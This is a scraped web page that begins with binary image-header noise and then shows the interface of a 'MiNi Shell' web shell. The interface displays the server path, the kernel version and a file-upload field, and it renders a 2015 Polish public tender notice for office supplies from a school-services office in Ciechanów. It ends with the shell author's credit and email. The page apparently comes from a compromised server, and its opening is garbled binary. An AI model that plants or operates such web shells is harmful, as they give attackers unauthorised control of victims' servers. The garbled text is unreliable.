JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150518/116160-N-2015.html

<p class="kh_header"><b>Ciechanów: Dostawa  materiałów biurowych dla Zakładu Obsługi Szkół i Przedszkoli w Ciechanowie</b><br>
<b>Numer ogłoszenia: 116160 - 2015; data zamieszczenia: 18.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Obsługi Szkół i Przedszkoli w Ciechanowie , ul. Jesionowa 27, 06-400 Ciechanów, woj. mazowieckie, tel. 0 23 673 72 72, faks 0 23 673 72 72 wew. 31.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zosipciechanow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  materiałów biurowych dla Zakładu Obsługi Szkół i Przedszkoli w Ciechanowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Papier do kserokopiarki A-4 (80g/m2)	                                            550ryz			
2. Papier do kserokopiarki A-3 (80g/m2)	                                             20 ryz			
3. Segregator duży A-4 70(dolna krawędź wzmocniona listwą )    	 300szt			
4. Segregator duży A-4 50(dolna krawędź wzmocniona listwą)   	  150szt			
5. Koperta biała  C-6 z klejem	                                                                        4000szt		
6. Koperta biała  C-5 z klejem	                                                                        2000szt	
7. Koperta biała  C-4 z klejem	                                                                        2000szt		
8.hp Office jet pro 8600 plus: oryginał :   - kartridżCN045A(HP950XL)Czarny                                                                  10 szt   - kartridż CN046A (HP951XL) Niebieski                                                              8 szt   - kartridż CN047A (HP951XL) Purpurowy                                                           8 szt   - kartridż CN048A (HP 951XL) Żółty                                                                     8 szt 9. Toner HP   P2055 regenerowany	                                                              4szt			
10.HP Q2613A          hp1300 regenerowany	                                              10szt 11.HP Q2612A           hp1010 regenerowany	                                              10szt			
12.HP Q5949A           hp1320  regenerowany	                                                 8szt			
13.Hp 1018    regenerowany		                                                              7szt   		
14.Hp 2015n   regenerowany	                                                                            7szt		
15.Toner kyocera TK 320 regenerowany	                                                5szt		
16.Toner Kyocera Mita KM 1620 regenerowany	                                                6szt		
17.Skoroszyt kartonowy zwykły	                                                                        280szt		
18.Skoroszyt plastikowy	                                                                        200szt		
19.Teczka wiązana kartonowa                                                                          250szt    		
20.Teczka wiązana plastikowa	                                                                       200szt    		
21.Koszulki do pism A-4 ( 120?m)	                                                       1500szt	
22.Blok makulaturowy notatnik A-4  (kratka)	                                             30szt		
23.Blok makulaturowy notatnik A-5 (kratka)	                                             50szt		
24.Kwitariusz numer. w zes.A-4	                                                                           12bl		
25.Polecenie przelewu A-6	                                                                           60bl		
26.Kasa przyjmie A-6                                                                                              60bl		
27.Kasa wypłaci A-6                                                                                                60bl		
28.Raport kasowy A-5                                                                                            50bl	
29.Zamówienie ogólne  A-5                                                                                    8bl		
30.Korektor pisakowy (materiał końcówki stal nierdzewna, 
rozmiar linii korygowania od 0.8mm do 1.2mm,pojemność  
od 6ml  do 10ml  , rodzaj tuszu olejowy)	                                            50szt		
31.Korektor  w myszce  (długość taśmy  od 5m do 8m, 
  szerokość 5 mm)		                                              	               100zt		
32.Klej kulkowy wyposażony w metalową kulkę do 
nanoszenia kleju pojemność od 40 ml do 60 ml, kolor transparentowy    80szt		
33.Spinacze biurowe metalowe małe28mm (op.100szt)                            400op		
34.Spinacze biurowe metalowe duże50mm  (op.100szt)                           200op		
35.Zszywki 24/6 (op.1000szt)                                                                          250op		
35.Ołówki  biurowe  zwykłe                                                                               40szt		
36.Ołówki automatyczne z gumowym uchwytem i przyciskiem
 z boku , grubość grafitu 0.5mm                                                                       25szt 38.Gryfie do ołówka aut. 0.5   2B(op.12szt)                                                    30op		
39. Rolka Delton 5.7 mm (Taśma kasowa  papierowa  
o szerokości 57mm długości minimum 25m)                                                150szt			
40. Piórko kulkowe rozmiar kulki 0,5mm,zawartość
 tuszu  od 1.4g do  1,6g                                                                                       50szt	
41. Płyty  CD-R                                                                                                     150szt
	
42.Opakowanie plastikowe do płyt CD                	                                         150szt
43. piórko kulkowe(np.sx-217) - szybkoschnący tusz pigmentowy,  wodoodporny  i odporny ma blaknięcie  piszący po śliskim
 papierze np. faktury, papier kredowy, nie rozmazuje się,
 nie blaknie pod wpływem światła, ani nie przesiąka 
przez papier; średnica kulki  0,7 mm grubość linii pisma
 ok. 0,35 mm; wymienny wkład	                                                                      30szt			
44. Wkład do piórka kulkowego  (np.sx-217)                                               150szt
45. Kostka kolorowa 85x85 (bez klejowa)	                                        150szt		
46. Kostka  samoprzylepna 51x38	                                                      150szt		
47. Kostka samoprzylepna 105x76	                                                      150szt		
48. Kostka   85x85 (bez klejowa)	                                                       150szt  49. HP Color LaserJet CP1215 oryginał :
CB541A  -                                                                                                            4szt  CB540A  -                                                                                                           4szt  CB543A  -                                                                                                           4szt  CB542A   -                                                                                                          4szt 50. Długopis  z szybkoschnącym tuszem na bazie oleju , 
na wkłady wymienne , długość linii pisania od 1600m 
do 1800m ,grubość linii pisania od 0.25mm do 0.30 mm	                         30szt
51. Gumka ołówkowa  (duża)                                                                          15szt
52. Koszulki z klapką (op.10szt)	                                                                     20op
53. Skoroszyt z klipsem (op.10szt)                                                                  20op		
54. Naboje do pióra  ,,parkier,, (op.5szt)                                                       10op		
55. Kostka samoprzylepna  76 x76                                                                 25szt		
56. Klipsy  biurowe 25 mm (12szt)                                                                  30op		
57. Klipsy biurowe   41 mm (12szt)                                                                 30op			
58. Karton  wizytówkowy A4,230gm2 (op.20szt)	                           20op	
59. Canon Pixma MP280 czarny   regenerowany                                           5szt			
60. Canon Pixma MP280 kolor       regenerowany                                          3szt	
61. HP Deskjet 3525  Advantage   -   Black - (Cz109AE)  oryginał                                                                         24szt  -   Magenta - (Cz111AE) oryginał                                                                   16szt  -   Yellow - (Cz112AE)   oryginał                                                                     16szt       -   Cyan - (Cz110AE)  oryginał                                                                         16szt 62. HP LaserJet Pro 300 Color M351a :
-  CE410A - oryginał                                                                                            4szt -  CE411A - oryginał                                                                                            3szt -  CE413A - oryginał                                                                                            3szt -  CE412A - oryginał	                                                                                    3szt 63. HP 920       hp Office jet 6500                                                                                 
 -  (CD971AE)    - regenerowany                                                                                   5szt
 -  (CD972AE)   -  regenerowany                                                                                   3szt                                                                                                                                            
-   (CD973AE)    -  regenerowany                                                                                  3szt                                                                                                                                                                                                                      
-   (CD974AE)     - regenerowany                                                                                  3szt  .
 
 Kompleksowa dostawa artykułów biurowych wg  zapotrzebowań zamawiającego w cyklu jednomiesięcznym w terminie do 5 dni roboczych od daty złożenia  zapotrzebowania  . Fakturowanie dostaw  również w cyklu   jednomiesięcznym .W sytuacjach wyjątkowych dostawa materiałów w cyklu krótszym niż jednomiesięczny w oparciu o zapotrzebowanie i dowód WZ z fakturowaniem na koniec okresu rozliczeniowego.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez wykonawcę 3 dostaw  o wartości jak w SIWZ w zakresie zaopatrywania w artykuły biurowe i eksploatacyjne  w  okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Potwierdzonych referencjami zamawiających o należytej staranności ich wykonania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez wykonawcę - Opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego , że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 50000 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Niezmienność cen liczona w miesiącach - 20</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zosipciechanow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Obsługi Szkół i Przedszkoli 
ul. Jesionowa 27 
06-400 Ciechanów..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2015 godzina 12:00, miejsce: Zakład Obsługi Szkół i Przedszkoli 
ul. Jesionowa 27 
06-400 Ciechanów..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com